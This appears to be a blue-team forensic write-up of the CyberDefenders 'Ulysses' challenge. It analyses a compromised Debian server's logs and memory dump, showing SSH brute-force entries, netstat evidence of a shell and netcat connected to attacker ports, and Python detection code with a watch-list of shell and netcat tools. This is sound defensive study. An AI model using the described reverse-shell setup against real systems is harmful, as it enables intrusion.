Introduction
Hey, it's me, your useless wannabe engineer.
This article is a writeup of my attempt at the "Ulysses" challenge on CyberDefenders (see the link below).
Note: this challenge tests Blue-team analysis skills rather than Red-team penetration testing.
Environment setup
A filesystem dump, a memory dump and a Volatility profile are provided, so I set up the environment on REMnux.
remnux@remnux:~/Downloads/Ulysses$ sudo mount victoria-v8.sda1.img /mnt/ulysses/sda/
remnux@remnux:~/Downloads/Ulysses$ sudo cp Debian5_26.zip /usr/local/lib/python2.7/dist-packages/volatility/plugins/overlays/linux/
remnux@remnux:~/Downloads/Ulysses$
remnux@remnux:~/Downloads/Ulysses$ vol.py --info |grep -i debian
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
LinuxDebian5_26x86 - A Profile for Linux Debian5_26 x86
remnux@remnux:~/Downloads/Ulysses$
First, check whether Volatility can actually read the memory dump.
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img imageinfo
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : No suggestion (Instantiated with LinuxDebian5_26x86)
AS Layer1 : IA32PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/remnux/Downloads/Ulysses/victoria-v8.memdump.img)
PAE type : No PAE
DTB : 0x3bc000L
LinuxDebian5_26x86 appears in the output, so it looks readable.
The attacker was performing a Brute Force attack. What account triggered the alert?
First, locate the log files on the filesystem.
remnux@remnux:/mnt/ulysses/sda$ find /mnt/ulysses/sda -name "*log*" 2>/dev/null
/mnt/ulysses/sda/bin/login
/mnt/ulysses/sda/usr/bin/rlogin
/mnt/ulysses/sda/usr/bin/setlogcons
/mnt/ulysses/sda/usr/bin/lastlog
/mnt/ulysses/sda/usr/bin/logname
/mnt/ulysses/sda/usr/bin/savelog
/mnt/ulysses/sda/usr/bin/logger
/mnt/ulysses/sda/usr/bin/slogin
/mnt/ulysses/sda/usr/bin/faillog
/mnt/ulysses/sda/usr/include/lastlog.h
/mnt/ulysses/sda/usr/include/syslog.h
/mnt/ulysses/sda/usr/include/bits/syslog-ldbl.h
/mnt/ulysses/sda/usr/include/bits/syslog.h
/mnt/ulysses/sda/usr/include/bits/syslog-path.h
/mnt/ulysses/sda/usr/include/linux/netfilter/nfnetlink_log.h
/mnt/ulysses/sda/usr/include/linux/netfilter_bridge/ebt_log.h
/mnt/ulysses/sda/usr/include/linux/netfilter_bridge/ebt_ulog.h
/mnt/ulysses/sda/usr/include/sys/syslog.h
/mnt/ulysses/sda/usr/include/sys/klog.h
...(omitted)
/mnt/ulysses/sda/sbin/sulogin
/mnt/ulysses/sda/sbin/logsave
/mnt/ulysses/sda/var/cache/apt/archives/rsyslog_3.18.6-4_i386.deb
/mnt/ulysses/sda/var/cache/apt/archives/logrotate_3.7.1-5_i386.deb
/mnt/ulysses/sda/var/cache/apt/archives/login_1%3a4.1.1-6+lenny1_i386.deb
/mnt/ulysses/sda/var/run/rsyslogd.pid
/mnt/ulysses/sda/var/log
/mnt/ulysses/sda/var/log/pycentral.log
/mnt/ulysses/sda/var/log/daemon.log
/mnt/ulysses/sda/var/log/lastlog
/mnt/ulysses/sda/var/log/exim4/rejectlog
/mnt/ulysses/sda/var/log/exim4/mainlog
/mnt/ulysses/sda/var/log/exim4/paniclog
/mnt/ulysses/sda/var/log/installer/syslog
/mnt/ulysses/sda/var/log/auth.log
/mnt/ulysses/sda/var/log/kern.log
/mnt/ulysses/sda/var/log/apt/term.log
/mnt/ulysses/sda/var/log/user.log
/mnt/ulysses/sda/var/log/syslog
/mnt/ulysses/sda/var/log/lpr.log
/mnt/ulysses/sda/var/log/faillog
/mnt/ulysses/sda/var/log/dpkg.log
/mnt/ulysses/sda/var/log/mail.log
/mnt/ulysses/sda/var/lib/logrotate
/mnt/ulysses/sda/var/lib/dpkg/alternatives/rlogin
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.list
/mnt/ulysses/sda/var/lib/dpkg/info/login.preinst
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.md5sums
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.conffiles
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.prerm
/mnt/ulysses/sda/var/lib/dpkg/info/login.postinst
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.conffiles
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.list
/mnt/ulysses/sda/var/lib/dpkg/info/login.md5sums
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.postinst
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.preinst
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.md5sums
/mnt/ulysses/sda/var/lib/dpkg/info/login.list
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.preinst
/mnt/ulysses/sda/var/lib/dpkg/info/rsyslog.postrm
/mnt/ulysses/sda/var/lib/dpkg/info/login.conffiles
/mnt/ulysses/sda/var/lib/dpkg/info/logrotate.postrm
/mnt/ulysses/sda/lib/security/pam_loginuid.so
/mnt/ulysses/sda/lib/security/pam_lastlog.so
/mnt/ulysses/sda/lib/security/pam_nologin.so
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/scsi/qlogicfas408.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/scsi/pcmcia/qlogic_cs.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/scsi/qlogicfas.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/md/dm-log.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/input/joystick/analog.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/drivers/input/mouse/logibm.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/net/netfilter/nfnetlink_log.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/net/bridge/netfilter/ebt_ulog.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/net/bridge/netfilter/ebt_nflog.ko
/mnt/ulysses/sda/lib/modules/2.6.26-2-686/kernel/net/bridge/netfilter/ebt_log.ko
/mnt/ulysses/sda/lib/udev/logger.agent
Given the question, auth.log is the obvious place to look.
remnux@remnux:/mnt/ulysses/sda$ cat /mnt/ulysses/sda/var/log/auth.log
Jan 18 09:31:44 victoria login[2001]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jan 18 09:31:44 victoria login[2021]: ROOT LOGIN on 'tty1'
Jan 18 09:58:01 victoria login[1975]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
Jan 18 09:58:02 victoria login[2000]: ROOT LOGIN on 'tty1'
Jan 18 10:57:37 victoria login[1973]: pam_unix(login:session): session opened for user root by LOGIN(uid=0)
...(omitted)
Feb 6 15:16:46 victoria sshd[2088]: Failed password for invalid user ulysses from 192.168.56.1 port 34441 ssh2
Feb 6 15:16:49 victoria sshd[2088]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:16:51 victoria sshd[2088]: Failed password for invalid user ulysses from 192.168.56.1 port 34441 ssh2
Feb 6 15:16:54 victoria sshd[2088]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:16:56 victoria sshd[2088]: Failed password for invalid user ulysses from 192.168.56.1 port 34441 ssh2
Feb 6 15:16:56 victoria sshd[2088]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
Feb 6 15:16:58 victoria sshd[2090]: Invalid user ulysses from 192.168.56.1
Feb 6 15:16:58 victoria sshd[2090]: Failed none for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:16:59 victoria sshd[2090]: Failed password for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:16:59 victoria sshd[2090]: Failed password for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:17:00 victoria sshd[2090]: Failed password for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:17:01 victoria sshd[2092]: Invalid user ulysses from 192.168.56.1
Feb 6 15:17:01 victoria sshd[2092]: Failed none for invalid user ulysses from 192.168.56.1 port 34443 ssh2
Feb 6 15:17:01 victoria CRON[2094]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 6 15:17:02 victoria CRON[2094]: pam_unix(cron:session): session closed for user root
Feb 6 15:17:02 victoria sshd[2092]: Failed password for invalid user ulysses from 192.168.56.1 port 34443 ssh2
Feb 6 15:17:02 victoria sshd[2092]: Failed password for invalid user ulysses from 192.168.56.1 port 34443 ssh2
Feb 6 15:17:02 victoria sshd[2092]: Failed password for invalid user ulysses from 192.168.56.1 port 34443 ssh2
Feb 6 15:17:03 victoria sshd[2097]: Invalid user ulysses from 192.168.56.1
Feb 6 15:17:03 victoria sshd[2097]: Failed none for invalid user ulysses from 192.168.56.1 port 34444 ssh2
Feb 6 15:17:05 victoria sshd[2097]: Failed password for invalid user ulysses from 192.168.56.1 port 34444 ssh2
Feb 6 15:17:07 victoria sshd[2097]: Failed password for invalid user ulysses from 192.168.56.1 port 34444 ssh2
Feb 6 15:17:07 victoria sshd[2097]: Failed password for invalid user ulysses from 192.168.56.1 port 34444 ssh2
Feb 6 15:17:08 victoria sshd[2099]: Invalid user ulysses from 192.168.56.1
Feb 6 15:17:08 victoria sshd[2099]: Failed none for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:17:12 victoria sshd[2099]: Failed password for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:17:12 victoria sshd[2099]: Failed password for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:17:12 victoria sshd[2099]: Failed password for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:19:25 victoria sshd[2153]: Invalid user ulysses from 192.168.56.1
Feb 6 15:19:25 victoria sshd[2153]: Failed none for invalid user ulysses from 192.168.56.1 port 34475 ssh2
Feb 6 15:19:27 victoria sshd[2153]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:19:27 victoria sshd[2153]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
Feb 6 15:19:29 victoria sshd[2153]: Failed password for invalid user ulysses from 192.168.56.1 port 34475 ssh2
Feb 6 15:19:32 victoria sshd[2153]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:19:34 victoria sshd[2153]: Failed password for invalid user ulysses from 192.168.56.1 port 34475 ssh2
Feb 6 15:19:35 victoria sshd[2153]: Failed password for invalid user ulysses from 192.168.56.1 port 34475 ssh2
Feb 6 15:19:35 victoria sshd[2153]: PAM 1 more authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
Feb 6 15:20:54 victoria sshd[2157]: Invalid user ulysses from 192.168.56.1
Feb 6 15:20:54 victoria sshd[2157]: Failed none for invalid user ulysses from 192.168.56.1 port 44616 ssh2
Feb 6 15:20:58 victoria sshd[2157]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:20:58 victoria sshd[2157]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
Feb 6 15:21:00 victoria sshd[2157]: Failed password for invalid user ulysses from 192.168.56.1 port 44616 ssh2
Feb 6 15:21:03 victoria sshd[2157]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:21:05 victoria sshd[2157]: Failed password for invalid user ulysses from 192.168.56.1 port 44616 ssh2
Feb 6 15:21:09 victoria sshd[2157]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:21:10 victoria sshd[2157]: Failed password for invalid user ulysses from 192.168.56.1 port 44616 ssh2
Feb 6 15:21:10 victoria sshd[2157]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
remnux@remnux:/mnt/ulysses/sda$
The user name jumps right out.
Ans: ulysses
How many were failed attempts there?
Ans: 32
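To make the brute-force pattern above mechanical rather than eyeballed, here is an added example (my own code, not part of the original writeup or the challenge) that parses sshd failure lines in the auth.log format shown and aggregates guesses per user and source address. The sample is constructed from lines of the excerpt plus one made-up "root" line; the threshold is an assumption, and the answer of 32 comes from the full file, which this sample does not reproduce.

```python
import re
from collections import defaultdict

# Constructed sample: sshd lines copied from the auth.log excerpt above, plus one
# made-up "root" line (last line) so the non-"invalid user" form is exercised too.
SAMPLE_AUTH_LOG = """\
Feb 6 15:16:46 victoria sshd[2088]: Failed password for invalid user ulysses from 192.168.56.1 port 34441 ssh2
Feb 6 15:16:49 victoria sshd[2088]: pam_unix(sshd:auth): check pass; user unknown
Feb 6 15:16:51 victoria sshd[2088]: Failed password for invalid user ulysses from 192.168.56.1 port 34441 ssh2
Feb 6 15:16:56 victoria sshd[2088]: Failed password for invalid user ulysses from 192.168.56.1 port 34441 ssh2
Feb 6 15:16:56 victoria sshd[2088]: PAM 2 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.56.1
Feb 6 15:16:58 victoria sshd[2090]: Invalid user ulysses from 192.168.56.1
Feb 6 15:16:58 victoria sshd[2090]: Failed none for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:16:59 victoria sshd[2090]: Failed password for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:16:59 victoria sshd[2090]: Failed password for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:17:00 victoria sshd[2090]: Failed password for invalid user ulysses from 192.168.56.1 port 34442 ssh2
Feb 6 15:17:01 victoria CRON[2094]: pam_unix(cron:session): session opened for user root by (uid=0)
Feb 6 15:17:08 victoria sshd[2099]: Invalid user ulysses from 192.168.56.1
Feb 6 15:17:08 victoria sshd[2099]: Failed none for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:17:12 victoria sshd[2099]: Failed password for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:17:12 victoria sshd[2099]: Failed password for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:17:12 victoria sshd[2099]: Failed password for invalid user ulysses from 192.168.56.1 port 34445 ssh2
Feb 6 15:30:00 victoria sshd[2200]: Failed password for root from 192.168.56.101 port 50000 ssh2
"""

# Matches both "Failed password for invalid user ulysses from ..." and
# "Failed password for root from ..."; the method group also catches "Failed none".
FAILED_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: Failed (?P<method>\w+) for "
    r"(?P<invalid>invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port (?P<port>\d+)"
)


def parse_ssh_failures(text):
    """Aggregate sshd failures per (user, source ip).

    Only "Failed password" is counted as a guess; "Failed none" is the client's
    initial credential-less probe and is kept separately. Distinct sshd pids
    show how many separate connections the source opened.
    """
    stats = defaultdict(lambda: {"password": 0, "none": 0, "pids": set(), "invalid": False})
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if not m:
            continue
        entry = stats[(m["user"], m["ip"])]
        entry["pids"].add(int(m["pid"]))
        if m["invalid"]:
            entry["invalid"] = True  # account does not exist: dictionary/spray pattern
        if m["method"] == "password":
            entry["password"] += 1
        elif m["method"] == "none":
            entry["none"] += 1
    return dict(stats)


def brute_force_alerts(stats, threshold=5):
    """Return (user, ip, guesses, connections) for each pair at or above the
    (assumed) threshold, most guesses first. Many short connections with a few
    guesses each is the retry loop of an automated tool, as in the log above."""
    hits = [
        (user, ip, e["password"], len(e["pids"]))
        for (user, ip), e in stats.items()
        if e["password"] >= threshold
    ]
    return sorted(hits, key=lambda h: (-h[2], h[0], h[1]))


def total_password_failures(stats):
    """Sum of logged password guesses across all user/source pairs."""
    return sum(e["password"] for e in stats.values())


if __name__ == "__main__":
    s = parse_ssh_failures(SAMPLE_AUTH_LOG)
    for user, ip, guesses, conns in brute_force_alerts(s):
        print(f"ALERT {user}@{ip}: {guesses} guesses over {conns} connections")
    print("total password failures:", total_password_failures(s))
```

Run it against the real /var/log/auth.log to get the full count; the PAM "N more authentication failures" lines summarise failures that sshd already logged individually, so they are deliberately not added on top.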
What kind of system runs on the targeted server?
Ans: Debian GNU/Linux 5.0
What is the victim's IP address?
This can be checked with linux_netstat.
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_netstat
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
UNIX 2190 udevd/776
UDP 0.0.0.0 : 111 0.0.0.0 : 0 portmap/1429
TCP 0.0.0.0 : 111 0.0.0.0 : 0 LISTEN portmap/1429
UDP 0.0.0.0 : 769 0.0.0.0 : 0 rpc.statd/1441
UDP 0.0.0.0 :38921 0.0.0.0 : 0 rpc.statd/1441
TCP 0.0.0.0 :39296 0.0.0.0 : 0 LISTEN rpc.statd/1441
UDP 0.0.0.0 : 68 0.0.0.0 : 0 dhclient3/1624
UNIX 5069 dhclient3/1624
UNIX 4617 rsyslogd/1661 /dev/log
UNIX 4636 acpid/1672 /var/run/acpid.socket
UNIX 4638 acpid/1672
TCP :: : 22 :: : 0 LISTEN sshd/1687
TCP 0.0.0.0 : 22 0.0.0.0 : 0 LISTEN sshd/1687
TCP :: : 25 :: : 0 LISTEN exim4/1942
TCP 0.0.0.0 : 25 0.0.0.0 : 0 LISTEN exim4/1942
UNIX 5132 login/1990
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 :56955 192.168.56.1 : 8888 ESTABLISHED nc/2169
remnux@remnux:~/Downloads/Ulysses$
Ans: 192.168.56.102
What are the attacker's two IP addresses? Format: comma-separated in ascending order
This is visible in the output of the previous command.
Ans: 192.168.56.1,192.168.56.101
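Both of the last two answers (the victim's address and the attacker addresses) fall out of the same socket table, so here is an added example (my own code, not from the writeup or from Volatility) that parses linux_netstat rows in the format shown above, dedupes the repeated socket entries, and flags established TCP connections owned by a shell or netcat. The sample is constructed from rows of the output above; the shell/netcat watch-list is an assumption.

```python
import re
from ipaddress import ip_address

# Constructed sample: rows in the format of the linux_netstat output above,
# including the repeated sh/2065 socket and a UNIX socket that must be ignored.
SAMPLE_NETSTAT = """\
UNIX 2190 udevd/776
UDP 0.0.0.0 : 111 0.0.0.0 : 0 portmap/1429
TCP 0.0.0.0 : 111 0.0.0.0 : 0 LISTEN portmap/1429
UDP 0.0.0.0 : 68 0.0.0.0 : 0 dhclient3/1624
UNIX 4617 rsyslogd/1661 /dev/log
TCP :: : 22 :: : 0 LISTEN sshd/1687
TCP 0.0.0.0 : 22 0.0.0.0 : 0 LISTEN sshd/1687
TCP 0.0.0.0 : 25 0.0.0.0 : 0 LISTEN exim4/1942
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 :43327 192.168.56.1 : 4444 ESTABLISHED sh/2065
TCP 192.168.56.102 : 25 192.168.56.101 :37202 CLOSE sh/2065
TCP 192.168.56.102 :56955 192.168.56.1 : 8888 ESTABLISHED nc/2169
"""

# The plugin prints "addr : port" with inconsistent spacing, hence \s*:\s*.
# UDP rows carry no state, so the state group is optional.
SOCKET_RE = re.compile(
    r"^(?P<proto>TCP|UDP)\s+(?P<laddr>\S+)\s*:\s*(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+)\s*:\s*(?P<rport>\d+)\s+(?:(?P<state>[A-Z_]+)\s+)?"
    r"(?P<proc>\S+)/(?P<pid>\d+)$"
)
WILDCARDS = {"0.0.0.0", "::"}
SHELLS = {"sh", "bash", "dash", "nc", "netcat", "ncat"}  # assumed watch-list


def parse_netstat(text):
    """Parse TCP/UDP rows into dicts, dropping UNIX sockets and exact duplicates
    (one socket shows up once per file descriptor that refers to it)."""
    seen, sockets = set(), []
    for line in text.splitlines():
        m = SOCKET_RE.match(line.strip())
        if not m:
            continue
        row = m.groupdict()
        row["lport"], row["rport"], row["pid"] = int(row["lport"]), int(row["rport"]), int(row["pid"])
        key = tuple(row.values())
        if key not in seen:
            seen.add(key)
            sockets.append(row)
    return sockets


def host_addresses(sockets):
    """Non-wildcard local addresses, i.e. the victim's own IPs."""
    return sorted({s["laddr"] for s in sockets if s["laddr"] not in WILDCARDS})


def remote_peers(sockets):
    """Every remote address the host talked to, in ascending numeric order
    (string sorting would put 192.168.56.101 before 192.168.56.2)."""
    peers = {s["raddr"] for s in sockets if s["raddr"] not in WILDCARDS}
    return sorted(peers, key=ip_address)


def shell_connections(sockets, watch=SHELLS):
    """ESTABLISHED TCP sockets owned by a shell or netcat. A mail server has no
    reason to hold these; they are the reverse-shell and exfiltration signal."""
    return [
        (s["proc"], s["pid"], s["raddr"], s["rport"])
        for s in sockets
        if s["proto"] == "TCP" and s["state"] == "ESTABLISHED" and s["proc"] in watch
    ]


if __name__ == "__main__":
    table = parse_netstat(SAMPLE_NETSTAT)
    print("victim:", host_addresses(table))
    print("peers:", ",".join(remote_peers(table)))
    for proc, pid, raddr, rport in shell_connections(table):
        print(f"SUSPICIOUS {proc}/{pid} -> {raddr}:{rport}")
```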
What is the "nc" service PID number that was running on the server?
This can be checked with the linux_pslist command.
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_pslist
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
Offset Name Pid PPid Uid Gid DTB Start Time
---------- -------------------- --------------- --------------- --------------- ------ ---------- ----------
0xcf42f900 init 1 0 0 0 0x0f4b8000 2011-02-06 12:04:09 UTC+0000
0xcf42f4e0 kthreadd 2 0 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42f0c0 migration/0 3 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42eca0 ksoftirqd/0 4 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e880 watchdog/0 5 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e460 events/0 6 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf42e040 khelper 7 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1a40 kblockd/0 39 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf4a1200 kacpid 41 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf45d140 kacpi_notify 42 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf46c940 kseriod 86 2 0 0 ---------- 2011-02-06 12:04:09 UTC+0000
0xcf43f100 pdflush 123 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d980 pdflush 124 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45d560 kswapd0 125 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf43f520 aio/0 126 2 0 0 ---------- 2011-02-06 12:04:10 UTC+0000
0xcf45c4e0 ksuspend_usbd 581 2 0 0 ---------- 2011-02-06 12:04:14 UTC+0000
0xcf48d1c0 khubd 582 2 0 0 ---------- 2011-02-06 12:04:14 UTC+0000
0xcf46d9c0 ata/0 594 2 0 0 ---------- 2011-02-06 12:04:15 UTC+0000
0xcf802a00 ata_aux 595 2 0 0 ---------- 2011-02-06 12:04:15 UTC+0000
0xcf43e080 scsi_eh_0 634 2 0 0 ---------- 2011-02-06 12:04:17 UTC+0000
0xcf45c0c0 kjournald 700 2 0 0 ---------- 2011-02-06 12:04:18 UTC+0000
0xcf46d5a0 udevd 776 1 0 0 0x0f5b2000 2011-02-06 12:04:21 UTC+0000
0xce978620 kpsmoused 1110 2 0 0 ---------- 2011-02-06 12:04:27 UTC+0000
0xce9796a0 portmap 1429 1 1 1 0x0eddf000 2011-02-06 12:04:35 UTC+0000
0xce973b00 rpc.statd 1441 1 102 0 0x0f8b3000 2011-02-06 12:04:35 UTC+0000
0xcf45c900 dhclient3 1624 1 0 0 0x0ec3d000 2011-02-06 12:04:39 UTC+0000
0xce972660 rsyslogd 1661 1 0 0 0x0e7ed000 2011-02-06 12:04:40 UTC+0000
0xcf43ece0 acpid 1672 1 0 0 0x0f8a8000 2011-02-06 12:04:40 UTC+0000
0xce979ac0 sshd 1687 1 0 0 0x0fa65000 2011-02-06 12:04:41 UTC+0000
0xcf45cd20 exim4 1942 1 101 103 0x0e7bc000 2011-02-06 12:04:44 UTC+0000
0xcf803a80 cron 1973 1 0 0 0x0f815000 2011-02-06 12:04:45 UTC+0000
0xcfaad720 login 1990 1 0 0 0x0eecf000 2011-02-06 12:04:45 UTC+0000
0xcf48c560 getty 1992 1 0 0 0x0ea31000 2011-02-06 12:04:45 UTC+0000
0xcf803240 getty 1994 1 0 0 0x0f671000 2011-02-06 12:04:45 UTC+0000
0xcf4a1620 getty 1996 1 0 0 0x0f838000 2011-02-06 12:04:45 UTC+0000
0xcf46cd60 getty 1998 1 0 0 0x0f83d000 2011-02-06 12:04:45 UTC+0000
0xcf4a0180 getty 2000 1 0 0 0x0e89e000 2011-02-06 12:04:45 UTC+0000
0xcf8021c0 bash 2042 1990 0 0 0x0eecc000 2011-02-06 14:04:38 UTC+0000
0xcfaacee0 sh 2065 1 0 0 0x0f517000 2011-02-06 14:07:15 UTC+0000
0xcfaac280 memdump 2168 2042 0 0 0x08088000 2011-02-06 14:42:27 UTC+0000
0xcf43e8c0 nc 2169 2042 0 0 0x08084000 2011-02-06 14:42:27 UTC+0000
remnux@remnux:~/Downloads/Ulysses$
Ans: 2169
What service was exploited to gain access to the system? (one word)
The service name apparently ends with the character 4. That suggests exim4, but let's dig a little further. Check the command history with linux_bash.
remnux@remnux:~/Downloads/Ulysses$ vol.py -f victoria-v8.memdump.img --profile=LinuxDebian5_26x86 linux_bash
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
from cryptography.hazmat.backends.openssl import backend
Pid Name Command Time Command
-------- -------------------- ------------------------------ -------
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim4
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim4-base
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim4-daemon-light
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -l | grep exim
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim4-config
2042 bash 2011-02-06 14:04:39 UTC+0000 ls -a
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg --purge
2042 bash 2011-02-06 14:04:39 UTC+0000 pwd
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get remove exim
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -l | grep exim
2042 bash 2011-02-06 14:04:39 UTC+0000 mkdir exim4
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4-config_4.69-9_all.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 cd exim4/
2042 bash 2011-02-06 14:04:39 UTC+0000 scp yom@192.168.56.1:/home/yom/temporary/exmi4/* .
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4-base_4.69-9_i386.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4-base_4.69-9_i386.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i --ignore-depends=exim4-base,exim4-daemon-light exim4_4.69-9_all.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4_4.69-9_all.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 /etc/init.d/networking restart
2042 bash 2011-02-06 14:04:39 UTC+0000 ifconfig
2042 bash 2011-02-06 14:04:39 UTC+0000 /etc/init.d/networking start
2042 bash 2011-02-06 14:04:39 UTC+0000 halt
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install openssh-server
2042 bash 2011-02-06 14:04:39 UTC+0000 apt-get install openssh-server
2042 bash 2011-02-06 14:04:39 UTC+0000 cd /etc/exim4/
2042 bash 2011-02-06 14:04:39 UTC+0000 scp yom@192.168.56.1:/home/yom/temporary/exim4/* .
2042 bash 2011-02-06 14:04:39 UTC+0000 dpkg -i exim4-daemon-light_4.69-9_i386.deb
2042 bash 2011-02-06 14:04:39 UTC+0000 cd ..
2042 bash 2011-02-06 14:04:39 UTC+0000 ls
2042 bash 2011-02-06 14:04:39 UTC+0000 rm -rf exim4/
2042 bash 2011-02-06 14:04:39 UTC+0000 vi .bash
